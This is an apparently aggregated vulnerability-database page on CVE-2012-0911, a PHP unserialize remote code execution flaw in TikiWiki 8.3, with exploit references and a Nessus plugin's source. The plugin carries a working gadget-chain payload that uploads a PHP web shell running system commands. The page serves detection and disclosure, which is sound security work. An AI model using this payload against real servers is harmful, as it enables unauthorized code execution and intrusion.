Groupware

CVSS 9.8 - CRITICAL

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

HIGH

Integrity impact

HIGH

Availability impact

HIGH

network

low complexity

tiki

CWE-502

critical

nessus

exploit available

metasploit

NVD

Published: 2012-07-12

Updated: 2024-01-21

Summary

TikiWiki CMS/Groupware before 6.7 LTS and before 8.4 allows remote attackers to execute arbitrary PHP code via a crafted serialized object in the (1) cookieName to lib/banners/bannerlib.php; (2) printpages or (3) printstructures parameter to (a) tiki-print_multi_pages.php or (b) tiki-print_pages.php; or (4) sendpages, (5) sendstructures, or (6) sendarticles parameter to tiki-send_objects.php, which is not properly handled when processed by the unserialize function.

Vulnerable Configurations

Part	Description	Count
Application	Tiki Tiki Tikiwiki Cms/Groupware *	2

Common Weakness Enumeration (CWE)

CWE-502 - Deserialization of Untrusted Data

D2sec

name	Tiki Wiki CMS Groupware 8.3 RCE
url	http://www.d2sec.com/exploits/tiki_wiki_cms_groupware_8.3_rce.html

Exploit-Db

description	Tiki Wiki. CVE-2012-0911. Webapps exploit for php platform
file	exploits/php/webapps/19630.rb
id	EDB-ID:19630
last seen	2016-02-02
modified	2012-07-09
platform	php
port
published	2012-07-09
reporter	metasploit
source	https://www.exploit-db.com/download/19630/
title	Tiki Wiki <= 8.3 unserialize PHP Code Execution
type	webapps

description	Tiki Wiki CMS Groupware <= 8.3 - "unserialize()" PHP Code Execution. CVE-2012-0911. Webapps exploit for php platform
file	exploits/php/webapps/19573.php
id	EDB-ID:19573
last seen	2016-02-02
modified	2012-07-04
platform	php
port
published	2012-07-04
reporter	EgiX
source	https://www.exploit-db.com/download/19573/
title	Tiki Wiki CMS Groupware <= 8.3 - "unserialize" PHP Code Execution
type	webapps

Metasploit

description	This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script, which is called with user controlled data from the 'printpages' parameter. The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy class to write arbitrary PHP code to a file on the Tiki Wiki web directory. In order to run successfully three conditions must be satisfied (1) display_errors php setting must be On to disclose the filesystem path of Tiki Wiki, (2) The Tiki Wiki Multiprint feature must be enabled to exploit the unserialize() and (3) a php version older than 5.3.4 must be used to allow poison null bytes in filesystem related functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.
id	MSF:EXPLOIT/UNIX/WEBAPP/TIKIWIKI_UNSERIALIZE_EXEC
last seen	2020-03-24
modified	2019-08-02
published	2012-07-05
references	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911 http://dev.tiki.org/item4109
reporter	Rapid7
source	https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
title	Tiki Wiki unserialize() PHP Code Execution

Nessus

NASL family	CGI abuses
NASL id	TIKIWIKI_UNSERIALIZE_CODE_EXECUTION.NASL
description	The version of the TikiWiki installed on the remote host contains a flaw that could allow a remote attacker to execute arbitrary code. The
last seen	2020-06-01
modified	2020-06-02
plugin id	61733
published	2012-08-30
reporter	This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/61733
title	TikiWiki unserialize() Function Arbitrary Code Execution
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(61733); script_version("1.14"); script_cvs_date("Date: 2019/12/04"); script_cve_id("CVE-2012-0911"); script_bugtraq_id(54298); script_xref(name:"EDB-ID", value:"19573"); script_name(english:"TikiWiki unserialize() Function Arbitrary Code Execution"); script_summary(english:"Attempts to execute arbitrary PHP code"); script_set_attribute(attribute:"synopsis", value: "The remote web server hosts an application that allows arbitrary code execution."); script_set_attribute(attribute:"description", value: "The version of the TikiWiki installed on the remote host contains a flaw that could allow a remote attacker to execute arbitrary code. The 'unserialize()' function is not properly sanitized before being used in the 'lib/banners/bannerlib.php', 'tiki-print_multi_pages.php', 'tiki-send_objects.php' and 'tiki-print_pages.php' scripts. Successful exploitation of the vulnerability requires that the 'multiprint' feature is enabled, the PHP setting 'display_errors' must be set to 'On', and a PHP version older than 5.3.4 must be in use to allow poison NULL bytes in filesystem-related functions."); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2012/Jul/19"); script_set_attribute(attribute:"see_also", value:"https://tiki.org/article191-Tiki-Releases-8-4"); script_set_attribute(attribute:"solution", value: "Upgrade to version 8.4 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Tiki Wiki CMS Groupware 8.3 RCE"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Tiki Wiki unserialize() PHP Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2012/08/04"); script_set_attribute(attribute:"patch_publication_date", value:"2012/05/01"); script_set_attribute(attribute:"plugin_publication_date", value:"2012/08/30"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:tikiwiki:tikiwiki"); script_end_attributes(); script_category(ACT_DESTRUCTIVE_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("tikiwiki_detect.nasl", "os_fingerprint.nasl"); script_require_keys("www/tikiwiki", "www/PHP"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); include("url_func.inc"); include("data_protection.inc"); port = get_http_port(default:80, php:TRUE); install = get_install_from_kb( appname : "tikiwiki", port : port, exit_on_fail : TRUE ); dir = install["dir"]; install_url = build_url(qs:dir+'/', port:port); # Get full path for use in our exploit POST request url = dir + '/tiki-rss_error.php'; res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE); get_path = eregmatch(pattern:"[> ](([a-zA-Z]:\\\|\/).)tiki-rss_error\.php", string:res[2], icase:TRUE); if (isnull(get_path)) exit(0, "The full path for the TikiWiki install at "+install_url+" could not be determined."); install_path = get_path[1]; # Determine which command to execute on target host os = get_kb_item("Host/OS"); if (os && report_paranoia < 2) { if ("Windows" >< os) cmd = 'ipconfig /all'; else cmd = 'id'; cmds = make_list(cmd); } else cmds = make_list('id', 'ipconfig /all'); cmd_pats = make_array(); cmd_pats['id'] = "uid=[0-9]+.gid=[0-9]+."; cmd_pats['ipconfig /all'] = "Subnet Mask"; token = (SCRIPT_NAME - ".nasl") + "-" + unixtime() + ".php"; foreach cmd (cmds) { # Get path to the file uploaded for use in our reporting section if (cmd == 'id') upload_path = "system('pwd')"; else upload_path = "system('dir "+ token +"')"; # Form our PHP file to upload php_shell = "<?php+echo('<pre>');+system('"+ cmd +"');+echo(' - "+token+" ');+"+upload_path+";?>"; shell_length = strlen(php_shell); path = install_path + token + "%00"; path_length = strlen(path) - 2; printpages = 'O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:' + '{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:' + '{s:12:\"%00%00_docCount\";i:1;s:8:\"%00%00_name\";s:3:\"foo\";s:13:\"%00%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:' + '{s:11:\"%00%00_dirPath\";s:' + path_length +':"'+path+'";}' + 's:10:\"%00%00_fields\";a:1:' + '{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:' + '{s:4:\"name\";s:'+shell_length+':"'+php_shell+'";}}' + 's:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}'; printpages = urlencode( str : printpages, unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~'-+$", case_type : HEX_UPPERCASE ); # Send POST request to upload the PHP file res2 = http_send_recv3( port : port, method : "POST", item : dir + '/tiki-print_multi_pages.php', data : 'printpages=' + printpages, add_headers : make_array("Content-Type","application/x-www-form-urlencoded"), exit_on_fail : TRUE ); if ('Required features: <b>feature_wiki_multiprint</b>' >< res2[2]) exit(0, "The Multiprint feature appears to be disabled for the TikiWiki install at "+install_url+"."); exp_request = http_last_sent_request(); # Try accessing the file we uploaded url3 = dir + "/" + token; res3 = http_send_recv3(method:"GET", item:url3, port:port, exit_on_fail:TRUE); if (egrep(pattern:cmd_pats[cmd], string:res3[2])) { # Remove NULL byte and format the output if (cmd == 'id') { out_full = strstr(res3[2], "uid"); pos = stridx(out_full, " - " + token); output = substr(out_full, 0, pos); form_up_path = strstr(res3[2], "php"); form_up_path2 = stridx(form_up_path, '\n'); form_up_path3 = substr(form_up_path, 0, form_up_path2) - "php "; get_up_path = chomp(form_up_path3) + "/" + token; } else { out_full = strstr(res3[2], "Windows IP Configuration"); pos = stridx(out_full, " - " + token); output = substr(out_full, 0, pos); form_up_path = strstr(res3[2],"Directory of"); form_up_path2 = stridx(form_up_path, '\n'); form_up_path3 = substr(form_up_path, 0, form_up_path2) - "Directory of "; get_up_path = chomp(form_up_path3) + "\" + token; } if (report_verbosity > 0) { snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30); report = '\nNessus was able to verify the issue exists using the following request :' + '\n' + '\n' + build_url(qs:url3, port:port) + '\n' + '\nNote: This file has not been removed by Nessus and will need to be' + '\nmanually deleted (' + get_up_path + ').' + '\n'; if (report_verbosity > 1) { report += '\nThis file was uploaded using the following request :' + '\n' + '\n' + snip + '\n' + exp_request + '\n' + snip + '\n' + '\n' + 'The file uploaded by Nessus executed the command : '+ cmd + '\nwhich produced the following output :' + '\n' + '\n' + snip + '\n' + data_protection::sanitize_uid(output:chomp(output)) + '\n' + snip + '\n'; } security_hole(port:port, extra:report); } else security_hole(port); exit(0); } } audit(AUDIT_WEB_APP_NOT_AFFECTED, "TikiWiki", install_url);

Packetstorm

data source	https://packetstormsecurity.com/files/download/114479/tikiwikicms-exec.txt
id	PACKETSTORM:114479
last seen	2016-12-05
published	2012-07-04
reporter	EgiX
source	https://packetstormsecurity.com/files/114479/Tiki-Wiki-CMS-Groupware-8.3-Code-Execution.html
title	Tiki Wiki CMS Groupware 8.3 Code Execution

data source	https://packetstormsecurity.com/files/download/114526/tikiwiki_unserialize_exec.rb.txt
id	PACKETSTORM:114526
last seen	2016-12-05
published	2012-07-06
reporter	EgiX
source	https://packetstormsecurity.com/files/114526/Tiki-Wiki-8.3-unserialize-PHP-Code-Execution.html
title	Tiki Wiki <= 8.3 unserialize() PHP Code Execution

Seebug

bulletinFamily	exploit
description	Bugtraq ID: 54298 CVE ID:CVE-2012-0911 Tiki Wiki CMS Groupware是一款内容管理和协作系统。 Tiki Wiki CMS Groupware多个脚本使用用户可控的输入调用"unserialize()"，这可导致通过传递ad-hoc Zend Framework序列化对象来执行任意PHP代码。 0 Tiki Wiki CMS Groupware <= 8.3 厂商补丁： Tiki Wiki ----- Tiki Wiki CMS Groupware 8.4已经修复此漏洞，建议用户下载使用： http://info.tiki.org/article191-Tiki-Releases-8-4
id	SSV:60261
last seen	2017-11-19
modified	2012-07-06
published	2012-07-06
reporter	Root
source	https://www.seebug.org/vuldb/ssvid-60261
title	Tiki Wiki CMS Groupware 'unserialize()' PHP代码执行漏洞

bulletinFamily	exploit
description	## Tiki Wiki CMS Groupware 'unserialize()'多个远程PHP代码执行漏洞 ## 漏洞类型：设计缺陷 ## 漏洞成因： Tiki Wiki CMS Groupware v6.9、9.3之前版本存在安全漏洞，某些脚本对用户控制的输入使用了 "unserialize()"操作，攻击者可利用此漏洞在受影响应用中注入和执行任意PHP代码。 ## 修补建议：更新到最新版本 http://info.tiki.org/article210-Tiki-10-0-is-here
id	SSV:73494
last seen	2017-11-19
modified	2014-07-01
published	2014-07-01
reporter	Root
source	https://www.seebug.org/vuldb/ssvid-73494
title	Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution

Summary

Vulnerable Configurations

Common Weakness Enumeration (CWE)

D2sec

Exploit-Db

Metasploit

Nessus

Packetstorm

Seebug

References